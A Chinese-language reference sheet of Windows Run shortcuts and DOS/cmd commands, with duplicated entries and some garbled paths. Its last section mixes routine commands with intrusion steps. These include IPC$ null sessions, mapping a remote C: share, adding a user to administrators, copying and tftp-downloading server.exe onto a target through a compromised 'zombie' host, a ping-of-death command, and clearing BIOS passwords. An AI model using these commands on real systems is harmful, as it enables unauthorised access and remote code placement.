chcp 修改默認字符集
chcp 936默認中文
chcp 65001
第一部分
- appwiz.cpl:程序和功能
- calc:啟動計算器
- chkdsk.exe:Chkdsk磁盤檢查(管理員身份運行命令提示符)
- cleanmgr: 打開磁盤清理工具
- cmd.exe:CMD命令提示符
- 自動關機命令
- Shutdown -s -t 600:表示600秒后自動關機
- shutdown -a :可取消定時關機
- Shutdown -r -t 600:表示600秒后自動重啟 - CompMgmtLauncher:計算機管理
- compmgmt.msc:計算機管理
- credwiz:備份或還原儲存的用戶名和密碼
- control:控制面版
- dcomcnfg:打開系統組件服務
- devmgmt.msc:設備管理器
- desk.cpl:屏幕分辨率
- dfrgui:優化驅動器 Windows 7→dfrg.msc:磁盤碎片整理程序
- dialer:電話撥號程序
- diskmgmt.msc:磁盤管理
- dvdplay:DVD播放器
- dxdiag:檢查DirectX信息
- eudcedit:造字程序
- eventvwr:事件查看器
- explorer:打開資源管理器
- Firewall.cpl:Windows防火牆
- fsmgmt.msc:共享文件夾管理器
- gpedit.msc:組策略
- hdwwiz.cpl:設備管理器
- inetcpl.cpl:Internet屬性
- intl.cpl:區域
- iexpress:木馬捆綁工具,系統自帶
- joy.cpl:游戲控制器
- logoff:注銷命令
- lusrmgr.msc:本地用戶和組
- lpksetup:語言包安裝/刪除向導,安裝向導會提示下載語言包
- lusrmgr.msc:本機用戶和組
- main.cpl:鼠標屬性
- mmsys.cpl:聲音
- mem.exe:顯示內存使用情況(如果直接運行無效,可以先管理員身份運行命令提示符,在命令提示符里輸入mem.exe>d:a.txt 即可打開d盤查看a.txt,里面的就是內存使用情況了。當然什么盤什么文件名可自己決定。)
- mmc:打開控制台
- mobsync:同步命令
- Msconfig.exe:系統配置實用程序
- msdt:微軟支持診斷工具
- msinfo32:系統信息
- mspaint:畫圖
- Msra:Windows遠程協助
- mstsc:遠程桌面連接
- NAPCLCFG.MSC:客戶端配置
- ncpa.cpl:網絡連接
- narrator:屏幕“講述人”
- Netplwiz:高級用戶帳戶控制面板,設置登陸安全相關的選項
- netstat : an(TC)命令檢查接口
- notepad:打開記事本
- Nslookup:IP地址偵測器
- odbcad32:ODBC數據源管理器
- OptionalFeatures:打開“打開或關閉Windows功能”對話框
- osk:打開屏幕鍵盤
- perfmon.msc:計算機性能監測器
- perfmon:計算機性能監測器
- PowerShell:提供強大遠程處理能力
- printmanagement.msc:打印管理
- powercfg.cpl:電源選項
- psr:問題步驟記錄器
- Rasphone:網絡連接
- Recdisc:創建系統修復光盤
- Resmon:資源監視器
- Rstrui:系統還原
- regedit.exe:注冊表
- regedt32:注冊表編輯器
- rsop.msc:組策略結果集
- sdclt:備份狀態與配置,就是查看系統是否已備份
- secpol.msc:本地安全策略
- services.msc:本地服務設置
- sfc /scannow:掃描錯誤並復原/windows文件保護
- sfc.exe:系統文件檢查器
- shrpubw:創建共享文件夾
- sigverif:文件簽名驗證程序
- slui:Windows激活,查看系統激活信息
- slmgr.vbs -dlv :顯示詳細的許可證信息
- slmgr.vbs -dli :顯示許可證信息
- slmgr.vbs -xpr :當前許可證截止日期
- slmgr.vbs -dti :顯示安裝ID 以進行脫機激
- slmgr.vbs -ipk :(Product Key)安裝產品密鑰
- slmgr.vbs -ato :激活Windows
- slmgr.vbs -cpky :從注冊表中清除產品密鑰(防止泄露引起的攻擊)
- slmgr.vbs -ilc :(License file)安裝許可證
- slmgr.vbs -upk :卸載產品密鑰
- slmgr.vbs -skms :(name[ort] )批量授權 - snippingtool:截圖工具,支持無規則截圖
- soundrecorder:錄音機,沒有錄音時間的限制
- StikyNot:便箋
- sysdm.cpl:系統屬性
- sysedit:系統配置編輯器
- syskey:系統加密,一旦加密就不能解開,保護系統的雙重密碼
- taskmgr:任務管理器(舊版)
- TM任務管理器(新版)
- taskschd.msc:任務計划程序
- timedate.cpl:日期和時間
- UserAccountControlSettings用戶賬戶控制設置
- utilman:輔助工具管理器
- wf.msc:高級安全Windows防火牆
- WFS:Windows傳真和掃描
- wiaacmgr:掃描儀和照相機向導
- winver:關於Windows
- wmimgmt.msc:打開windows管理體系結構(WMI)
- write:寫字板
- wscui.cpl:操作中心
- wscript:windows腳本宿主設置
- wuapp:Windows更新
第二部分
- gpedit.msc-----組策略
- sndrec32-------錄音機
- Nslookup-------IP地址偵測器 ,是一個 監測網絡中 DNS 服務器是否能正確實現域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中卻沒有集成這一個工具。
- explorer-------打開資源管理器
- logoff---------注銷命令
- shutdown-------60秒倒計時關機命令
- lusrmgr.msc----本機用戶和組
- services.msc---本地服務設置
- oobe/msoobe /a----檢查XP是否激活
- notepad--------打開記事本
- cleanmgr-------垃圾整理
- net start messenger----開始信使服務
- compmgmt.msc---計算機管理
- net stop messenger-----停止信使服務
- conf-----------啟動netmeeting
- dvdplay--------DVD播放器
- charmap--------啟動字符映射表
- diskmgmt.msc---磁盤管理實用程序
- calc-----------啟動計算器
- dfrg.msc-------磁盤碎片整理程序
- chkdsk.exe-----Chkdsk磁盤檢查
- devmgmt.msc--- 設備管理器
- regsvr32 /u *.dll----停止dll文件運行
- drwtsn32------ 系統醫生
- rononce -p----15秒關機
- dxdiag---------檢查DirectX信息
- regedt32-------注冊表編輯器
- Msconfig.exe---系統配置實用程序
- rsop.msc-------組策略結果集
- mem.exe--------顯示內存使用情況
- regedit.exe----注冊表
- winchat--------XP自帶局域網聊天
- progman--------程序管理器
- winmsd---------系統信息
- perfmon.msc----計算機性能監測程序
- winver---------檢查Windows版本
- sfc /scannow-----掃描錯誤並復原
- taskmgr-----任務管理器(2000/xp/2003
- winver---------檢查Windows版本
- wmimgmt.msc----打開windows管理體系結構(WMI)
- wupdmgr--------windows更新程序
- wscript--------windows腳本宿主設置
- write----------寫字板
- winmsd---------系統信息
- wiaacmgr-------掃描儀和照相機向導
- winchat--------XP自帶局域網聊天
- mem.exe--------顯示內存使用情況
- Msconfig.exe---系統配置實用程序
- mplayer2-------簡易widnows media player
- mspaint--------畫圖板
- mstsc----------遠程桌面連接
- mplayer2-------媒體播放機
- magnify--------放大鏡實用程序
- mmc------------打開控制台
- mobsync--------同步命令
- dxdiag---------檢查DirectX信息
- iexpress-------木馬捆綁工具,系統自帶 58. fsmgmt.msc-----共享文件夾管理器
- utilman--------輔助工具管理器
- diskmgmt.msc---磁盤管理實用程序
- dcomcnfg-------打開系統組件服務
- ddeshare-------打開DDE共享設置
- osk------------打開屏幕鍵盤
- odbcad32-------ODBC數據源管理器
- oobe/msoobe /a----檢查XP是否激活 114. logoff---------注銷命令
- notepad--------打開記事本
- nslookup-------網絡管理的工具向導
- ntbackup-------系統備份和還原
- narrator-------屏幕“講述人”
- ntmsmgr.msc----移動存儲管理器
- ntmsoprq.msc---移動存儲管理員操作請求
- netstat -an----(TC)命令檢查接口
- syncapp--------創建一個公文包
- sysedit--------系統配置編輯器
- sigverif-------文件簽名驗證程序
- ciadv.msc------索引服務程序
- shrpubw--------創建共享文件夾
- secpol.msc-----本地安全策略
- syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
- services.msc---本地服務設置
- Sndvol32-------音量控制程序
- sfc.exe--------系統文件檢查器
- sfc /scannow---windows文件保護
- ciadv.msc------索引服務程序
- tourstart------xp簡介(安裝完成后出現的漫游xp程序)
- taskmgr--------任務管理器
- eventvwr-------事件查看器
- eudcedit-------造字程序
- compmgmt.msc---計算機管理
- packager-------對象包裝程序
- perfmon.msc----計算機性能監測程序
- charmap--------啟動字符映射表
- cliconfg-------SQL SERVER 客戶端網絡實用程序
- Clipbrd--------剪貼板查看器
- conf-----------啟動netmeeting
- certmgr.msc----證書管理實用程序
- regsvr32 /u *.dll----停止dll文件運行
- regsvr32 /u zipfldr.dll------取消ZIP支持
- cmd.exe--------CMD命令提示符
- chkdsk.exe-----Chkdsk磁盤檢查
第三部分
1.磁盤操作
fdisk 隱含 參數 /mbr 重建主引導記錄fdisk /mbr 重建主引導記錄
fdisk 在DOS7.0以后增加了/cmbr參數,可在掛接多個物理硬盤時,重建排序在后面的硬盤的主引導記錄,例如:fdisk /cmbr 2,可重寫第二個硬盤的主引導記錄。(在使用時要十分小心,避免把好的硬盤引導記錄損壞)
format 參數: /q 快速格式化 /u 不可恢復 /autotest 不提示 /s 創建 MS-DOS 引導盤 format c: /q /u /autotest
2.目錄操作
DIR [目錄名或文件名] [/S][/W][/P][/A] 列出目錄 參數: /s 查找子目錄/w 只顯示文件名 /p 分頁/a 顯示隱藏文件 DIR format.exe /s查找該盤的format.exe文件並報告位置
MD (MKDIR) [目錄名] 創建目錄 MKDIR HELLOWORLD 創建HELLOWORLD目錄
CD (CHDIR) [目錄名] PS:可以使用相對目錄或絕對目錄 進入目錄 CD AA 進入當前文件夾下的AA目錄,cd .. 進入上一個文件夾cd \返回根目錄;cd c:\windows 進入c:\windows文件夾
RD ( RMDIR) [目錄名] 刪除目錄 RD HELLOWORLD 刪除HELLOWORLD目錄
3.文件操作
刪除目錄及其文件: rmdir [目錄名或文件名] [/S][/W][/P][/A] 。例 rmdir c:\qqdownload/s 刪除C盤的qqdownload目錄。
del [目錄名或文件名] [/f][/s][/q] 刪除 參數:/f 刪除只讀文件/s 刪除該目錄及其下的所有內容 /q 刪除前不確認
del c:\del /s /q 自動刪除c盤的del目錄。
copy [源文件或目錄] [目標目錄] 復制文件 copy d:\pwin98*.* c:\presetup 將d盤的pwin98的所有文件復制到c盤的presetup下。
attrib [參數][源文件或目錄] 文件屬性操作命令,attrib命令可以列出或修改磁盤上文件的屬性,文件屬性包括文檔(A)、只讀(R)、隱藏(H)、系統(S),例如:attrib -h -r -s io.sys 執行這一命令后,將把DOS系統文件io.sys文件的只讀、隱藏、系統屬性去掉,這時將可以直接通過dir命令看到io.sys文件。attrib +h +r +s autoexec.bat將為自動批處理文件增加以上屬性。
4.內存操作
debug 調試內存 參數 -w [文件名] 寫入二進制文件 -o [地址1] [地址2] 輸出內存 -q 退出 exp:o 70 10[return] o 71 01
[return] 01[return] q[return] DOS下通過寫70h/71h PORT改變BIOS密碼在CMOS中存放的對應位置的值,用以清除AWARD BIOS密碼.debug 還可以破解硬盤保護卡等,但只可以在純DOS下用。
5.分區操作
給磁盤分區,一般都會分成四個區,磁盤分區由主分區、擴展分區、邏輯分區組成。
PQ和Acronis Disk Director這兩個工具都可以在不丟失數據的情況下對分區進行調整大小,以及合並等操作,XP系統的話你用PQ,WIN7系統的話用Acronis Disk Director 操作基本一樣,可以去網上找教程來看看,再不重裝系統的情況下都能調整分區大小,但是建議你還是先備份下數據再調整,畢竟對硬盤直接進行的操作有一定的危險性。
部分dos命令
net use ipipc$ " " /user:" " :建立IPC空鏈接
net use ipipc$ "密碼" /user:"用戶名" :建立IPC非空鏈接
net use h: ipc$ "密碼" /user:"用戶名" :直接登陸后映射對方C:到本地為H:
net use h: ipc$ :登陸后映射對方C:到本地為H:
net use ipipc$ /del :刪除IPC鏈接
net use h: /del :刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add :建立用戶
net user guest /active:yes :激活guest用戶
net user :查看有哪些用戶
net user 帳戶名 :查看帳戶的屬性
net localgroup administrators 用戶名 /add :把“用戶”添加到管理員中使其具有管理員權限
net start :查看開啟了哪些服務
net start 服務名 :開啟服務;(如:net start telnet, net start schedule)
net stop 服務名 :停止某服務
net time 目標ip :查看對方時間
net time 目標ip /set :設置本地計算機時間與“目標IP”主機的時間同步,加上參數/yes可取消確認信息
net view :查看本地局域網內開啟了哪些共享
net view ip :查看對方局域網內開啟了哪些共享
net config :顯示系統網絡設置
net logoff :斷開連接的共享
net pause 服務名 :暫停某服務
net send ip "文本信息" :向對方發信息
net ver :局域網內正在使用的網絡連接類型和信息
net share :查看本地開啟的共享
net share ipc$ :開啟ipc\(共享 net share ipc\) /del :刪除ipc\(共享 net share c\) /del :刪除C:共享
net user guest 12345 :用guest用戶登陸后用將密碼改為12345
net password 密碼 :更改系統登陸密碼
netstat -a :查看開啟了哪些端口,常用netstat -an
netstat -n :查看端口的網絡連接情況,常用netstat -an
netstat -v :查看正在進行的工作
netstat -p 協議名 |例:netstat -p tcq/ip :查看某協議使用情況
netstat -s :查看正在使用的所有協議使用情況
nbtstat -A ip :對方136到139其中一個端口開了的話,就可查看對方最近登陸的用戶名
tracert -參數 :ip(或計算機名) 跟蹤路由(數據包),參數:“-w數字”用於設置超時間隔。
ping ip(或域名) :向對方主機發送默認大小為32字節的數據,參數:“-l[空格]數據包大小”;“-n發送數據次數”;“-t”指一直ping。
ping -t -l 65550 ip :死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) :用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數“/all”顯示全部配置信息
tlist -t :以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F :進程名 加-F參數后強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名 :加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如“DEL/AR .”表示刪除當前目錄下所有只讀文件,“DEL/A-S .”表示刪除當前目錄下除系統文件以外的所有文件
del /S /Q 目錄 或用:rmdir /s /Q 目錄 :/S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符路徑要移動的文件名 存放移動文件的路徑移動后文件名 :移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt :對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令
at id號 :開啟已注冊的某個計划任務
at /delete :停止所有計划任務,用參數/yes則不需要確認就直接停止
at id號 /delete :停止某個已注冊的計划任務
at 查看所有的計划任務
at ip time 程序名(或一個命令) /r :在某時間運行對方某程序並重新啟動計算機
finger username @host :查看最近有哪些用戶登陸
telnet ip 端口 :遠和登陸服務器,默認端口為23
open ip 連接到IP(屬telnet登陸后的命令)
telnet :在本機上直接鍵入telnet 將進入本機的telnet
copy 路徑文件名1 路徑文件名2 /y :復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
copy c:srv.exe ipadmin$ :復制本地c:srv.exe到對方的admin下
copy 1st.jpg/b+2st.txt/a 3st.jpg :將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
copy ipadmin\(svv.exe :c: 或:copyipadmin\). 復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要復制的文件或目錄樹 目標地址目錄名 :復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件用參數/e才可連目錄下的子目錄一起復制到目標地址下。
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exec:server.exe :登陸后,將“IP”的server.exe下載到目標主機c:server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IP put c:server.exe :登陸后,上傳本地c:server.exe至主機
ftp ip 端口 :用於上傳文件至服務器或進行文件操作,默認端口為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route print :顯示出IP路由,將主要顯示網絡地址Network addres,子網掩碼Netmask,網關地址Gateway addres,接口地址Interface
arp :查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 :/max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem :查看cpu使用情況
attrib 文件名(目錄名) :查看某文件(目錄)的屬性
attrib 文件名 :-A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
dir :查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t :使用此參數即“DATE/T”、“TIME/T”將只顯示當前日期和時間,而不必輸入新日期和時間
set :指定環境變量名稱=要指派給變量的字符 設置環境變量
set :顯示當前所有的環境變量
set p(或其它字符) :顯示出當前以字符p(或其它字符)開頭的所有環境變量
pause :暫停批處理程序,並顯示出:請按任意鍵繼續....
if :在批處理程序中執行條件處理(更多說明見if命令及變量)
goto 標簽 :將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:“:start”標簽)
call 路徑批處理文件名 :從批處理程序中調用另一個批處理程序 (更多說明見call /?)
for :對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變量)
echo on或off :打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 :在屏幕上顯示出信息
echo 信息 >> pass.txt :將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt :在aa.txt文件中尋找字符串hello
find 文件名 :查找某文件
title 標題名字 :更改CMD窗口標題名字
color 顏色值 :設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 :更改cmd.exe的顯示的命令提示符(把C:、D:統一改為:EntSky )
ver :在DOS窗口下顯示版本信息
winver :彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)
format 盤符 /FS:類型 格式化磁盤,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目錄名 :創建目錄
replace 源文件 :要替換文件的目錄 替換文件
ren 原文件名 新文件名 :重命名文件名
tree :以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱
type 文件名 :顯示文本文件的內容
more 文件名 :逐屏顯示輸出文件
doskey 要鎖定的命令=字符
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:doskey dir=
taskmgr :調出任務管理器
chkdsk /F D: 檢查磁盤D並顯示狀態報告;加參數/f並修復磁盤上的錯誤
tlntadmn :telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認端口23為其它任何端口
exit :退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exe
path :路徑可執行文件的文件名 為可執行文件設置一個路徑。
cmd :啟動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啟命令擴展;更我詳細說明見cmd /?
regedit /s :注冊表文件名 導入注冊表;參數/S指安靜模式導入,無任何提示;
regedit /e :注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問權限;/G 用戶名:perm 賦予指定用戶訪問權Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D: est.txt /D pub 設定d: est.txt拒絕pub用戶訪問。
cacls 文件名 :查看文件的訪問用戶權限列表
REM 文本內容 :在批處理文件中添加注解
netsh :查看或更改本地網絡配置情況
